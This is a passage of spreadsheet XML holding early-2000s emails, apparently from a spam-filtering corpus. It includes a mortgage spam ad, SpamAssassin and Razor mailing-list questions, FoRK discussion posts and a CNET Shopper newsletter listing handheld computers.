                         color=#ff0000&gt;6.25% 30 Yr Fixed Rate 
                         Mortgage&lt;/FONT&gt;&lt;/B&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;/TR&gt;
                     &lt;TR&gt;
                       &lt;TD&gt;
                         &lt;DIV align=left&gt;&lt;FONT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&lt;/FONT&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;
                   &lt;TABLE style="POSITION: relative; BORDER-COLLAPSE: collapse" 
                   borderColor=#111111 height=1 cellSpacing=0 cellPadding=0 
                   width=504 border=0&gt;
                     &lt;TR&gt;
                       &lt;TD vAlign=top width=325 height=1&gt;
                         &lt;DIV align=center&gt;&lt;FONT 
                         face="Verdana, Arial, Helvetica, sans-serif" 
                         size=2&gt;&lt;B&gt;&lt;BR&gt;&lt;/A&gt;&lt;A 
                         href="http://www.status100.com/mortgage/index34.html" 
                         target=new_win&gt;Click Here for a Free 
                         Quote!&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;A 
                         href="http://www.status100.com/mortgage/index34.html" 
                         target=new_win&gt; &lt;/A&gt;&lt;/DIV&gt;
                         &lt;P&gt;&lt;B&gt;&lt;FONT face=Verdana,Arial,Helvetica,sans-serif 
                         size=2&gt;Lock In YOUR LOW FIXED RATE TODAY&lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;
                         &lt;DL&gt;
                           &lt;DD&gt;&lt;B&gt;&lt;FONT face=Webdings color=#ff0000 size=5 
                           PTSIZE="10"&gt;a&lt;/FONT&gt;&lt;FONT 
                           face=Verdana,Arial,Helvetica,sans-serif size=2&gt;NO COST 
                           OUT OF POCKET&lt;/FONT&gt;&lt;/B&gt; 
                           &lt;DD&gt;&lt;B&gt;&lt;FONT face=Webdings color=#ff0000 size=5 
                           PTSIZE="10"&gt;a&lt;/FONT&gt;&lt;/B&gt;&lt;FONT 
                           face=Verdana,Arial,Helvetica,sans-serif size=2&gt;&lt;B&gt;NO 
                           OBLIGATION&lt;/B&gt;&lt;/FONT&gt; 
                           &lt;DD&gt;&lt;B&gt;&lt;FONT face=Webdings color=#ff0000 size=5 
                           PTSIZE="10"&gt;a&lt;/FONT&gt;&lt;/B&gt;&lt;FONT 
                           face=Verdana,Arial,Helvetica,sans-serif size=2&gt;&lt;B&gt;FREE 
                           CONSULTATION&lt;/B&gt;&lt;/FONT&gt; 
                           &lt;DD&gt;&lt;B&gt;&lt;FONT face=Webdings color=#ff0000 size=5 
                           PTSIZE="10"&gt;a&lt;/FONT&gt;&lt;/B&gt;&lt;FONT 
                           face=Verdana,Arial,Helvetica,sans-serif size=2&gt;&lt;B&gt;ALL 
                           CREDIT GRADES ACCEPTED&lt;/B&gt;&lt;/FONT&gt; &lt;/DD&gt;&lt;/DL&gt;
                         &lt;DIV align=center&gt;&lt;FONT 
                         face=Verdana,Arial,Helvetica,sans-serif color=red 
                         size=2&gt;&lt;B&gt;&lt;A 
                         href="http://www.status100.com/mortgage/index34.html"&gt;Rates as 
                         low as 6.25% won't stay this low forever CLICK 
                         HERE&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/DIV&gt;
                         &lt;DIV align=center&gt;&amp;nbsp;&lt;/DIV&gt;
                         &lt;DIV align=center&gt;&lt;FONT size=2 PTSIZE="10"&gt;&lt;B&gt;&lt;FONT 
                         style="FONT-SIZE: 6pt" 
                         face=Verdana,Arial,Helvetica,sans-serif&gt;* based on 
                         mortgage rate as of 5-15-02 as low as 6.25% see lender 
                         for details&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/DIV&gt;&lt;/TD&gt;
                       &lt;TD vAlign=top width=4 height=1&gt;
                         &lt;DIV align=right&gt;&amp;nbsp;&lt;/DIV&gt;&lt;/TD&gt;
                       &lt;TD borderColor=#006600 width=175 bgColor=#ffffff 
 height=1&gt;
                         &lt;H1&gt;&lt;SPAN style="VERTICAL-ALIGN: middle"&gt;&lt;FONT 
                         style="FONT-SIZE: 200px" face=Webdings color=#006600&gt;&lt;A 
                         href="http://www.status100.com/mortgage/index34.html"&gt;&lt;FONT 
                         color=#006600&gt;H&lt;/FONT&gt;&lt;/A&gt;&lt;/FONT&gt;&lt;/SPAN&gt;&lt;/H1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;
                   &lt;TABLE cellSpacing=0 cellPadding=3 width=472 border=0&gt;
                     &lt;TBODY&gt;
                     &lt;TR&gt;
                       &lt;TD colSpan=2 height=64&gt;&lt;FONT 
                         face="Verdana, Arial, Helvetica, sans-serif" size=2&gt;&lt;B&gt;
                         &lt;TABLE height=38 cellSpacing=2 cellPadding=0 width=482 
                         border=0&gt;
                           &lt;TBODY&gt;
                           &lt;TR&gt;
                             &lt;TD 
                             style="BORDER-RIGHT: 0px solid; BORDER-TOP: 0px solid; BORDER-LEFT: 0px solid; BORDER-BOTTOM: 0px solid" 
                             width=327 height=36&gt;&lt;FONT 
                               face=Verdana,Arial,Helvetica,sans-serif 
                               size=2&gt;Apply now and one of our lending partners 
                               will get back to you within 48 
                               hours.&lt;/FONT&gt;&lt;/FONT&gt;&lt;FONT style="FONT-SIZE: 6pt" 
                               face=Verdana,Arial,Helvetica,sans-serif&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/FONT&gt;&lt;FONT 
                             face="Verdana, Arial, Helvetica, sans-serif" size=2&gt;
                             &lt;TD style="BORDER-LEFT: 1px solid" width=141 
                             bgColor=#ff0000 height=36&gt;
                               &lt;P align=center&gt;&lt;B&gt;&lt;FONT color=#ffffff size=4&gt;&lt;A 
                               style="TEXT-DECORATION: none" 
                               href="http://www.status100.com/mortgage/index34.html"&gt;&lt;FONT 
                               color=#ffffff&gt;CLICK 
                             HERE!&lt;/FONT&gt;&lt;/A&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;&lt;/TD&gt;
               &lt;/TR&gt;
             &lt;/TABLE&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
       &lt;P&gt;complete name removing system at website.
 &lt;p&gt;
 &lt;/html&gt;
 4924161298765444333
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAtalk] spamd can't find...
</t>
  </si>
  <si>
    <t xml:space="preserve">I thought I'd installed razor correctly, but I am seeing the following in my 
 logs.  Can anyone give me a hitn?
 Sep  8 06:46:45 omega spamd[6514]: razor2 check skipped: No such file or 
 directory Can't locate object method "new" via package "Net::DNS::Resolver" 
 (perhaps you forgot to load "Net::DNS::Resolver"?) at (eval 31) line 1, 
 &lt;STDIN&gt; line 114. ^I...propagated at 
 /usr/lib/perl5/site_perl/5.6.1/Mail/SpamAssassin/Dns.pm line 392, &lt;STDIN&gt; 
 line 114.
 -- 
 Robin Lynn Frank
 Paradigm-Omega, LLC
 ==================================
 The only certainty about documentation is that
 whoever wrote it "might" have understood it.
 The rest of us may not be so lucky.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</si>
  <si>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Internet saturation (but not in Iceland)
</t>
  </si>
  <si>
    <t xml:space="preserve">Gary's news service at teledyn.com has an article on Internet Saturation.
 Let me ask you....If you were on a rock in the middle of the Atlantic, 
 mostly in the dark for half the year, wouldn't *you* like a bit of 
 internet distraction?   They've already done the obvious and fiber-ringed 
 the island.
 Eirikur
 --------
 Latest guestimate stats from Ireland's NUA show a flattening Internet 
 population growth. It seems there's two kinds of people, those who will go 
 online with the status quo, and those who won't: Canada levels out at 53%, 
 the USA at 59% (since 2000!), Denmark flatlines at 60%, Norway at 54%, 
 Sweden at 64%, and the UK at 55% ... only Iceland continues unfettered 
 beyond 60%. Could this be evidence of a usability barrier? If so, it's a 
 clear signal that there's as much fortune to be gained from a 
 substantially new Internet interface than all that has been gained so far.
 Latest guestimate stats from Ireland's NUA show a flattening Internet 
 population growth. It seems there's two kinds of people, those who will go 
 online with the status quo, and those who won't: Canada levels out at 53%, 
 the USA at 59% (since 2000!), Denmark flatlines at 60%, Norway at 54%, 
 Sweden at 64%, and the UK at 55% ... only Iceland continues unfettered 
 beyond 60%. Could this be evidence of a usability barrier? If so, it's a 
 clear signal that there's as much fortune to be gained from a 
 substantially new Internet interface than all that has been gained so far.
 http://www.nua.ie/surveys/how_many_online/
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: SWEET SMELL OF SUCCESS
</t>
  </si>
  <si>
    <t xml:space="preserve">Sorry... I just had a run-in with a neighbor whom I've never met before who
 pigeonholed me within one minute after I asked a question - he said 'Are you
 one of them environmentalists?' For some reason that narrowminded attitude
 of not listening to what I was saying and categorizing me into a box in his
 little paranoid republican fantasy world just pissed me off.
 Sheesh... I've been out of work too long...
 ----- Original Message -----
 From: "Tom" &lt;tomwhore@slack.net&gt;
 To: "Mr. FoRK" &lt;fork_list@hotmail.com&gt;
 Cc: "FoRK" &lt;fork@example.com&gt;
 Sent: Monday, September 23, 2002 2:22 PM
 Subject: Re: Goodbye Global Warming
 &gt;
 &gt; --]&gt; A Green once said that if the Spotted Owl hadn't existed they
 &gt; --]&gt; would have had to invent it.
 &gt; --]A Republican once said "I am not a crook".
 &gt; --]
 &gt;
 &gt; Oh great, another round of Lableisms....Let me know when you get back to
 &gt; real data..
 &gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] "No razor servers available at this time"
</t>
  </si>
  <si>
    <t xml:space="preserve">I'm getting "no servers available" about half the time in the last few days.
 This is with Razor 2. Is there something I need adjust in the installation
 here, or are the servers just down/overloaded?
 Thanks,
 Whit
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Save an extra $50 of Compaq's powerful iPaq H3835! (CNET SHOPPER)
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;head&gt;
 	&lt;title&gt;Shopper Newsletter: Alerts&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#EEEEEE" alink="#0000FF" vlink="#0000FF"&gt;
 &lt;center&gt;
 &lt;A href="top"&gt;&lt;/A&gt;&lt;!-- header --&gt;
 	&lt;table border=0 cellpadding=0 cellspacing=0 width=612 bgcolor="#ffffff"&gt;
 	&lt;tr valign=top&gt;
 		&lt;td width=442 colspan=5&gt;
 			&lt;img src="http://www.cnet.com/i/sh/nl/442_shopperALERT.gif" width="442" height="60" border="0" alt="CNET Shopper Newsletter Alerts"&gt;&lt;br&gt;
 				&lt;table width=442 cellpadding=0 cellspacing=0 border=0 bgcolor="#CCCCCC"&gt;
 					&lt;tr&gt;
 						&lt;td bgcolor="#999999" colspan=1&gt;
 							&lt;img src="http://home.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;br&gt;
 						&lt;/td&gt;
 						&lt;td bgcolor="#666666" colspan=1&gt;
 							&lt;img src="http://home.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;br&gt;
 						&lt;/td&gt;
 						&lt;td bgcolor="#666666" colspan=2&gt;
 							&lt;img src="http://home.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;br&gt;
 						&lt;/td&gt;
 					&lt;/tr&gt;
 					&lt;tr&gt;
 						&lt;td bgcolor="#999999" width=1 rowspan=2&gt;
 							&lt;img src="http://home.cnet.com/b.gif" width="1" height="10" border="0"&gt;&lt;br&gt;
 						&lt;/td&gt;
 						&lt;td bgcolor="#666666" width=1 rowspan=2&gt;
 							&lt;img src="http://home.cnet.com/b.gif" width="1" height="10" border="0"&gt;&lt;br&gt;
 						&lt;/td&gt;
 						&lt;td width=9 rowspan=2&gt;
 							&lt;img src="http://home.cnet.com/b.gif" width="1" height="10" border="0"&gt;&lt;br&gt;
 						&lt;/td&gt;
 						&lt;td  width=430&gt;
 							&lt;img src="http://home.cnet.com/b.gif" width="1" height="10" border="0"&gt;&lt;br&gt;
 						&lt;/td&gt;				
 					&lt;/tr&gt;
 					&lt;tr&gt;
 						&lt;td bgcolor="#666666"&gt;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&lt;div align="center"&gt;&lt;img src="http://i.i.com.com/cnwk.1d/Ads/common/advertisement.gif" width="120" height="10" border="0"&gt;&lt;/br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=df-1kJhQLEFhjaAE9jfbQq-Kh1XhaZR" target="new"&gt;   
 &lt;img src="http://www.techrepublic.com/images/ads/GoDaddy.sky.895domains.gif" width="160" height="600" border="0"&gt;
 &lt;/a&gt;&lt;/div&gt;
 &lt;!-- /insert ad here --&gt;
 &lt;br&gt;
 &lt;!-- Most Popular --&gt;
 &lt;!-- /Most Popular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href="http://clickthru.online.com/Click?q=f4-Y-XEQ0skaAWGlKguUJ5QddfWmTdR" &gt;Canon PowerShot S40&lt;/a&gt;&lt;br&gt;
 		&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 		&lt;td align=right&gt;&lt;FONT face="arial, helvetica" size=-1&gt;2&lt;/td&gt;
 		&lt;td&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;a href="http://clickthru.online.com/Click?q=0a-ZnKCIrrs-irjTrWBwhq6GOxuYzsR" &gt;Canon PowerShot G2&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 		&lt;td align=right&gt;&lt;FONT face="arial, helvetica" size=-1&gt;3&lt;/td&gt;
 		&lt;td&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;a href="http://clickthru.online.com/Click?q=1f-rvwqI58wt4KitAU1xmYgHobjqmZR" &gt;Gateway 600XL&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 		&lt;td align=right&gt;&lt;FONT face="arial, helvetica" size=-1&gt;4&lt;/td&gt;
 		&lt;td&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;a href="hhttp://shopper.cnet.com/shopping/resellers/0-7058426-311-8221154-0.html"&gt;Dell Latitude C400&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 		&lt;td align=right&gt;&lt;FONT face="arial, helvetica" size=-1&gt;5&lt;/td&gt;
 		&lt;td&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;a href="http://clickthru.online.com/Click?q=34-pJpSIcd8ls2S8U23_tvVyn4IcgdR" &gt;Cyber Shot DSC-F707&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 &lt;/table&gt; 
 &lt;!-- End Vertical Brick--&gt;
 					&lt;td width=9 rowspan=2&gt;&lt;img src="http://www.cnet.com/i/nl/dd_c.gif" width=9 height=60&gt;&lt;br&gt;
 						&lt;table width=9 cellpadding=0 cellspacing=0 border=0&gt;
 							&lt;tr&gt;
 								&lt;td bgcolor="#666666"&gt;&lt;img src="http://www.cnet.com/b.gif" width=9 height=1&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td bgcolor="#CCCCCC"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=10&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td bgcolor="#666666"&gt;&lt;img src="http://www.cnet.com/b.gif" width=9 height=1&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 						&lt;/table&gt;
 					&lt;/td&gt;
 					&lt;td width=1 bgcolor="#666666" rowspan=2&gt;
 						&lt;table width=1 cellpadding=0 cellspacing=0 border=0&gt;
 							&lt;tr&gt;
 								&lt;td bgcolor="#eeeeee"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=60&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 						&lt;/table&gt;
 					&lt;/td&gt;
 				&lt;/tr&gt;
 				&lt;tr valign=top&gt;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width=410 bgcolor="#ffffff"&gt;
 						&lt;table cellpadding=0 cellspacing=0 border=0 width=430 bgcolor="#EEEEEE"&gt;
 							&lt;tr valign=top&gt;
 								&lt;td width=10&gt;&lt;/td&gt;
 &lt;!-- Date --&gt;
 								&lt;td&gt;
 									&lt;table cellpadding=0 cellspacing=0 border=0 width=400&gt;
 										&lt;tr&gt;
 											&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=6&gt;&lt;/td&gt;
 										&lt;/tr&gt;
 										&lt;tr valign=top&gt;
 											&lt;td width=10&gt;&lt;img src="http://www.cnet.com/b.gif" width=10 height=1&gt;&lt;/td&gt;
 											&lt;td align=right width=400&gt;&lt;img src="http://www.cnet.com/b.gif"&gt;&lt;br&gt;
 											&lt;font face="arial, helvetica" size="-2"&gt;July 16, 2002&lt;/font&gt;&lt;/td&gt;
 										&lt;tr valign=top&gt;
 &lt;!--c4s--&gt;									&lt;td&gt;&lt;A href="#c4s"&gt;&lt;img src="http://www.cnet.com/i/nl/arr.gif" width=10 height=12														border=0&gt;&lt;/A&gt;&lt;/td&gt;
 											&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;A href="#c4s"&gt;&lt;b&gt;From Computers4Sure&lt;/b&gt;&lt;/A&gt;&lt;BR&gt;Save an extra $50 of Compaq's powerful iPaq H3835&lt;/font&gt;&lt;/td&gt;
 										&lt;/tr&gt;
 										&lt;tr&gt;
 											&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=4&gt;&lt;/td&gt;
 										&lt;/tr&gt;
 &lt;!--buy--&gt;							&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=4&gt;&lt;/td&gt;
 										&lt;/tr&gt;
 										&lt;tr valign=top&gt;
 											&lt;td&gt;&lt;A href="#buy"&gt;&lt;img src="http://www.cnet.com/i/nl/arr.gif" width=10 height=12 border=0&gt;&lt;/A&gt;&lt;/td&gt;
 											&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;A href="#buy"&gt;&lt;b&gt;From buy.com&lt;/b&gt;&lt;/A&gt; &lt;BR&gt;Break free from convention with Sharp's Linux-powered Zaurus SL-5500!&lt;/font&gt;&lt;/td&gt;
 										&lt;/tr&gt;
 										&lt;tr&gt;
 											&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=6&gt;&lt;/td&gt;
 										&lt;/tr&gt;
 								&lt;/table&gt;
 								&lt;table cellpadding=0 cellspacing=0 border=0 width=410&gt;
 									&lt;tr&gt;
 										&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=8&gt;&lt;/td&gt;
 									&lt;/tr&gt;
 								&lt;/table&gt;
 							&lt;/td&gt;
 						&lt;/tr&gt;
 					&lt;/table&gt;
 					&lt;table cellpadding=0 cellspacing=0 border=0 width=430&gt;
 						&lt;tr&gt;
 							&lt;td bgcolor="#999999"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;
 						&lt;/tr&gt;
 					&lt;/table&gt;
 &lt;br&gt;
 &lt;div style="MARGIN-LEFT: 10px; MARGIN-RIGHT: 10px"&gt;
 &lt;!-- C4S TEMPLATE --&gt;
 &lt;a name="c4s"&gt;
 					&lt;table cellpadding="0" cellspacing="0" border=0 width="410"&gt;
 						&lt;TBODY&gt;
 							&lt;tr&gt;
 								&lt;td valign=bottom&gt;&lt;font face="arial, helvetica" size="3"&gt;&lt;b&gt;Computers4Sure&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 								&lt;td&gt;
 									&lt;P align=right&gt;	
 										&lt;img style="border: #CCCCCC solid 1px;" src="http://shopper.cnet.com/Images/Resellers/Premier/235579.gif""&gt;&lt;/P&gt;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 Product 1 --&gt;
 							&lt;tr valign="top"&gt;
 								&lt;td width="120"&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=49-ZM4cIEpSmiVlKg3VX4RVXFO5JSrR" &gt;&lt;img style="border: #CCCCCC solid 1px;" src="http://shopper.cnet.com/i/co/ps/120/9062023_120_1.gif"&gt;&lt;/a&gt;&lt;/td&gt;
 								&lt;td width="10"&gt;&lt;img src="http://www.cnet.com/b.gif" width=10 height=1&gt;&lt;/td&gt;
 								&lt;td width=270 colspan="2"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=5f-WK5BIIKX_uS-R696fez6pa6cIJPR" &gt;&lt;B&gt;Sony CLIE PEG-NR70V&lt;/b&gt;&lt;/a&gt; &lt;BR&gt;
 								&amp;#149; Free shipping&lt;BR&gt; 
 &amp;#149; Built-in digital camera/MP3 &lt;BR&gt;
 &amp;#149; Built-in keyboard/color display &lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$599&lt;/font&gt;&lt;/B&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td width="400" colspan="4"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=12&gt;&lt;/td&gt;
 							&lt;/tr&gt;						
 &lt;!-- Product 2 --&gt;
 							&lt;tr valign=top&gt;
 								&lt;td width=120&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=74-VAV8IZZSX0LbEyCRYG8Y0gSPZxnR" &gt;&lt;img style="border: #CCCCCC solid 1px;" src="http://shopper.cnet.com/i/co/ps/120/7934746_120_1.gif"&gt;&lt;/a&gt;&lt;/td&gt;
 								&lt;td width="10"&gt;&lt;img src="http://www.cnet.com/b.gif" width=10 height=1&gt;&lt;/td&gt;
 								&lt;td width=270 colspan="2"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=89-h28bQ-J1jaqEVqFkUMBXB6W5WWcR" &gt;&lt;B&gt;Compaq iPaq H3835 &lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; $50 rebate&lt;BR&gt;
 								&amp;#149; Expandable Pocket PC&lt;BR&gt;
 								&amp;#149; 64 MB, brilliant TFT screen&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$549&lt;/font&gt; after rebate&lt;/B&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td width="400" colspan="4"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=12&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 &lt;!-- Product 3 --&gt;
 							&lt;tr valign=top&gt;
 									&lt;td width=120&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=9e-tWQoQtMQnDF1E75HSCN0U7nQUDRR" &gt;&lt;img style="border: #CCCCCC solid 1px;" src="http://shopper.cnet.com/i/co/ps/120/9946796_120_1.gif" width=120 height=90&gt;&lt;/a&gt;&lt;/td&gt;
 								&lt;td width="10"&gt;&lt;img src="http://www.cnet.com/b.gif" width=10 height=1&gt;&lt;/td&gt;
 								&lt;td width=270 colspan="2"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=b3-QHzxQYKTClWWCy9AE64qDAwrPGFR" &gt;&lt;B&gt;Handspring Treo 90&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; Free shipping&lt;BR&gt;
 								&amp;#149; Vivid color screen/keyboard&lt;BR&gt;
 								&amp;#149; 16MB of memory/Palm OS 4.1&lt;BR&gt;
 							    &amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$299&lt;/font&gt;&lt;/B&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td width="400" colspan="4"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=12&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 						&lt;/table&gt;	
 		&lt;p&gt;	&lt;BR CLEAR=ALL&gt;	
 &lt;!-- center ad --&gt;
 &lt;P&gt;
 &lt;P&gt;
 &lt;!-- /center ad --&gt;
 &lt;!-- buy.com TEMPLATE --&gt;
 &lt;a name="buy"&gt;
 					&lt;table cellpadding="0" cellspacing="0" border=0 width="410"&gt;
 						&lt;TBODY&gt;
 							&lt;tr&gt;
 								&lt;td valign=bottom&gt;&lt;font face="arial, helvetica" size="3"&gt;&lt;b&gt;buy.com&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 								&lt;td&gt;
 									&lt;P align=right&gt;	
 										&lt;img style="border: #CCCCCC solid 1px;" src="http://shopper.cnet.com/Images/Resellers/Premier/235276.gif""&gt;&lt;/P&gt;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&lt;tr&gt;
 								&lt;td width="400" colspan="4"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=12&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 &lt;!-- Product 1 --&gt;
 							&lt;tr valign="top"&gt;
 								&lt;td width="120"&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=c8-2lPnQWOzzG-SYy8MKE-nFr99H29R" &gt;&lt;img style="border: #CCCCCC solid 1px;" src="http://shopper.cnet.com/i/co/ps/120/8928341_120_1.gif"&gt;&lt;/a&gt;&lt;/td&gt;
 								&lt;td width="10"&gt;&lt;img src="http://www.cnet.com/b.gif" width=10 height=1&gt;&lt;/td&gt;
 								&lt;td width=270 colspan="2"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=dd-tpm0QzWdTGWm_zxGZP85eXsJh-uR" &gt;&lt;B&gt;Palm m515&lt;/b&gt;&lt;/a&gt; &lt;BR&gt;
 								&amp;#149; Free shipping&lt;BR&gt;&amp;#149; 16MB, Palm OS v4.1&lt;BR&gt;
 								&amp;#149; MultiMediaCard slot&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$395&lt;/font&gt;&lt;/B&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td width="400" colspan="4"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=12&gt;&lt;/td&gt;
 							&lt;/tr&gt;						
 &lt;!-- Product 2 --&gt;
 							&lt;tr valign=top&gt;
 								&lt;td width=120&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=f3-LjwgQJOwQs2fzYJCs3CyJqsjeoFR" &gt;&lt;img style="border: #CCCCCC solid 1px;" src="http://shopper.cnet.com/i/co/ps/120/8407129_120_1.gif"&gt;&lt;/a&gt;&lt;/td&gt;
 								&lt;td width="10"&gt;&lt;img src="http://www.cnet.com/b.gif" width=10 height=1&gt;&lt;/td&gt;
 								&lt;td width=270 colspan="2"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;	
 								&lt;a href="http://clickthru.online.com/Click?q=08-IFoQIRjFBeutnLEg3F-erCpGY99R" &gt;&lt;B&gt;Sharp Zaurus SL-5500&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; Free shipping&lt;BR&gt;
 								&amp;#149; 64MB, 3.5-in 65,536 color LCD&lt;BR&gt;
 								&amp;#149; CompactFlash and SD expansion&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$398&lt;/font&gt;&lt;/B&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td width="400" colspan="4"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=12&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 &lt;!-- Product 3 --&gt;&lt;tr valign=top&gt;
 								&lt;td width=120&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=1d-6KTjIGQFRg2orDKRl28NRQSnqQuR" &gt;&lt;img style="border: #CCCCCC solid 1px;" src="http://shopper.cnet.com/i/co/ps/120/7383486_120_1.gif"&gt;&lt;/a&gt;&lt;/td&gt;
 								&lt;td width="10"&gt;&lt;img src="http://www.cnet.com/b.gif" width=10 height=1&gt;&lt;/td&gt;
 								&lt;td width=270 colspan="2"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;	
 								&lt;a href="http://clickthru.online.com/Click?q=32-Gx5IIrQ6QHgGtRKDFWVhZSgRXBsR" &gt;&lt;B&gt;Compaq iPaq H3850&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; Free shipping&lt;BR&gt;
 								&amp;#149; 64MB RAM, 65K color TFT&lt;BR&gt;
 								&amp;#149; 206MHz Intel StrongARM, USB&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$549&lt;/font&gt;&lt;/B&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td width="400" colspan="4"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=12&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 						&lt;/table&gt;	
 		&lt;p&gt;	&lt;BR CLEAR=ALL&gt;		 
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;p&gt;
 &lt;/p&gt;&lt;/font&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/DIV&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;!-- ### footer ### --&gt;
 &lt;table width="612" bgcolor="#666666" cellpadding="0" cellspacing="0" border="0"&gt;
